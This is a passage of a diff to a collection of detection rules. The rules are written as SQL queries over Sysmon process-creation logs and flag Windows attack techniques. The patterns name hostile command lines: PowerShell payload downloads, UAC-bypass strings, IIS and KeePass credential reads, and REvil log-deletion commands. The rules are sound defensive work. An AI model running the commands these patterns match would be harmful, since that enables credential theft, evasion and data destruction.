CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], - "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" - }, - { - "title": "Potential DLL File Download Via PowerShell Invoke-WebRequest", - "id": "0f0450f3-8b47-441e-a31b-15a91dc243e2", - "status": "experimental", - "description": "Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet", - "author": "Florian Roth (Nextron Systems), Hieu Tran", "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%IWR %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\' AND 
CommandLine LIKE '%OutFile%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')" - ], - "filename": "proc_creation_win_powershell_download_dll.yml" - }, - { - "title": "Potential Renamed Rundll32 Execution", - "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", - "status": "experimental", - "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" + "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml" }, { - "title": "Operation Wocao Activity", - "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "title": "Invoke-Obfuscation Via Stdin", + "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1012", "attack.defense_evasion", - "attack.t1036.004", "attack.t1027", "attack.execution", - "attack.t1053.005", "attack.t1059.001" ], 
"falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_wocao.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" }, { - "title": "Microsoft IIS Service Account Password Dumped", - "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", + "title": "WMIC Remote Command Execution", + "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", "status": "experimental", - "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", - "author": "Tim Rauch, Janantha Marasinghe", + "description": "Detects the execution of WMIC to query information on a remote system", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.credential_access", - "attack.t1003" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" + "filename": "proc_creation_win_wmic_remote_execution.yml" }, { - "title": "Suspicious Encoded PowerShell Command Line", - "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "title": "SOURGUM Actor Behaviours", + "id": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", "status": "test", - "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "author": "MSTIC, FPT.EagleEye", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.t1546", + "attack.t1546.015", + "attack.persistence", + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\') OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '% JAB%' ESCAPE '\\' AND CommandLine LIKE '% -w%' ESCAPE '\\' AND CommandLine LIKE '% hidden %' ESCAPE '\\')) OR (CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% BA^J%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\') AND NOT (CommandLine LIKE '% -ExecutionPolicy%' ESCAPE '\\' AND CommandLine LIKE '%remotesigned %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%windows\\\\system32\\\\Physmem.sys%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\SHARED\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMEJP\\\\WimBootConfigurations.ini%' ESCAPE '\\' OR Image LIKE '%Windows\\\\system32\\\\ime\\\\IMETC\\\\WimBootConfigurations.ini%' ESCAPE '\\') OR ((Image LIKE '%windows\\\\system32\\\\filepath2%' ESCAPE '\\' OR Image LIKE 
'%windows\\\\system32\\\\ime%' ESCAPE '\\') AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND (CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{7c857801-7381-11cf-884d-00aa004b2e24}\\\\inprocserver32%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_LOCAL\\_MACHINE\\\\software\\\\classes\\\\clsid\\\\{cf4cc405-e2c5-4ddd-b3ce-5e7582d8c9fa}\\\\inprocserver32%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" + "filename": "proc_creation_win_apt_sourgrum.yml" }, { - "title": "Potential Dtrack RAT Activity", - "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "status": "stable", - "description": "Detects potential Dtrack RAT activity via specific process patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", + "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "status": "test", + "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1070.001" ], "falsepositives": [ - "Unlikely" + "Legitimate deactivation by administrative staff", + "Installer tools that disable services, e.g. 
before log collection agent installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_dtrack.yml" + "filename": "proc_creation_win_logman_disable_eventlog.yml" }, { - "title": "REvil Kaseya Incident Malware Patterns", - "id": "5de632bc-7fbd-4c8a-944a-fce55c59eae5", + "title": "Potential UAC Bypass Via Sdclt.EXE", + "id": "40f9af16-589d-4984-b78d-8c2aec023197", "status": "test", - "description": "Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)", - "author": "Florian Roth (Nextron Systems)", + "description": "A General detection for sdclt being spawned as an elevated process. 
This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.g0115" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%C:\\\\Windows\\\\cert.exe%' ESCAPE '\\' OR CommandLine LIKE '%del /q /f c:\\\\kworking\\\\agent.crt%' ESCAPE '\\' OR CommandLine LIKE '%Kaseya VSA Agent Hot-fix%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\MsMpEng.exe%' ESCAPE '\\' OR CommandLine LIKE '%rmdir /s /q \\%SystemDrive\\%\\\\inetpub\\\\logs%' ESCAPE '\\' OR CommandLine LIKE '%del /s /q /f \\%SystemDrive\\%\\\\%.log%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.exe%' ESCAPE '\\' OR CommandLine LIKE '%c:\\\\kworking1\\\\agent.crt%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cert.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking\\\\agent.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\kworking1\\\\agent.exe' ESCAPE '\\') OR (CommandLine LIKE '%del /s /q /f%' ESCAPE '\\' AND CommandLine LIKE '%WebPages\\\\Errors\\\\webErrorLog.txt%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%sdclt.exe' ESCAPE '\\' AND IntegrityLevel = 'High')" ], - "filename": "proc_creation_win_apt_revil_kaseya.yml" + "filename": "proc_creation_win_uac_bypass_sdclt.yml" }, { - "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", - "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "title": "Psr.exe Capture Screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", "status": "test", - "description": "Detects Netsh command execution that 
whitelists a program located in a suspicious location in the Windows Firewall", - "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.collection", + "attack.t1113" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_allow_program_in_susp_location.yml" + "filename": "proc_creation_win_psr_capture_screenshots.yml" }, { - "title": "WMIC Remote Command Execution", - "id": "7773b877-5abb-4a3e-b9c9-fd0369b59b00", + "title": "Suspicious PowerShell Mailbox Export to Share", + "id": "889719ef-dd62-43df-86c3-768fb08dc7c0", "status": "experimental", - "description": "Detects the execution of WMIC to query information on a remote system", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%/node:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/node:127.0.0.1 %' ESCAPE '\\' OR CommandLine LIKE '%/node:localhost %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' 
AND CommandLine LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND CommandLine LIKE '% -Mailbox %' ESCAPE '\\' AND CommandLine LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_remote_execution.yml" + "filename": "proc_creation_win_powershell_mailboxexport_share.yml" }, { - "title": "Potential Raspberry Robin Dot Ending File", - "id": "a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a", + "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", + "id": "47e4bab7-c626-47dc-967b-255608c9a920", "status": "experimental", - "description": "Detects commandline containing reference to files ending with a \".\" This scheme has been seen used by raspberry-robin", + "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine REGEXP '\\\\[a-zA-Z0-9]{1,32}\\.[a-zA-Z0-9]{1,6}\\.[ \"']{1}')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml" + "filename": "proc_creation_win_findstr_recon_everyone.yml" }, { - "title": 
"Potential Persistence Attempt Via Run Keys Using Reg.EXE", - "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "title": "Control Panel Items", + "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "status": "test", - "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the malicious use of a control panel item", + "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.002", "attack.persistence", - "attack.t1547.001" + "attack.t1546" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_reg_add_run_key.yml" + "filename": "proc_creation_win_control_panel_item.yml" }, { - "title": "Password Provided In Command Line Of Net.EXE", - "id": 
"d4498716-1d52-438f-8084-4a603157d131", + "title": "Suspicious Parent of Csc.exe", + "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "status": "test", - "description": "Detects a when net.exe is called with a password in the command line", - "author": "Tim Shelton (HAWK.IO)", - "falsepositives": [ - "Unknown" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '%:%\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%/USER:% %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% ' ESCAPE '\\')))" + "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007", + "attack.defense_evasion", + "attack.t1218.005", + "attack.t1027.004" ], - "filename": "proc_creation_win_net_use_password_plaintext.yml" - }, - { - "title": "Abusing IEExec To Download Payloads", - "id": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", - "status": "experimental", - "description": "Detects execution of the IEExec utility to download payloads", - "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\IEExec.exe' ESCAPE '\\' OR OriginalFileName = 'IEExec.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage 
LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ieexec_download.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Recon Information for Export with Command Prompt", - "id": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "title": "Potential Active Directory Enumeration Using AD Module - ProcCreation", + "id": "70bc5215-526f-4477-963c-a47a5c9ebd12", "status": "experimental", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1119" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tree.com' ESCAPE '\\' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\doskey.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\') OR OriginalFileName IN ('wmic.exe', 'DOSKEY.EXE', 'sc.exe')) AND (ParentCommandLine LIKE '% > \\%TEMP\\%\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '% > \\%TMP\\%\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Import-Module %' ESCAPE '\\' OR CommandLine LIKE '%ipmo %' ESCAPE '\\') AND CommandLine LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_recon.yml" + "filename": 
"proc_creation_win_powershell_active_directory_module_dll_import.yml" }, { - "title": "Powershell Token Obfuscation - Process Creation", - "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", - "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "title": "Audio Capture via PowerShell", + "id": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", + "status": "test", + "description": "Detects audio capture via PowerShell Cmdlet.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\' OR CommandLine LIKE '%Toggle-AudioDevice%' ESCAPE '\\' OR CommandLine LIKE '%Get-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Set-AudioDevice %' ESCAPE '\\' OR CommandLine LIKE '%Write-AudioDevice %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_token_obfuscation.yml" + "filename": "proc_creation_win_powershell_audio_capture.yml" }, { - "title": "File Download with Headless Browser", - "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", - "status": "test", - "description": "This is an unusual method to 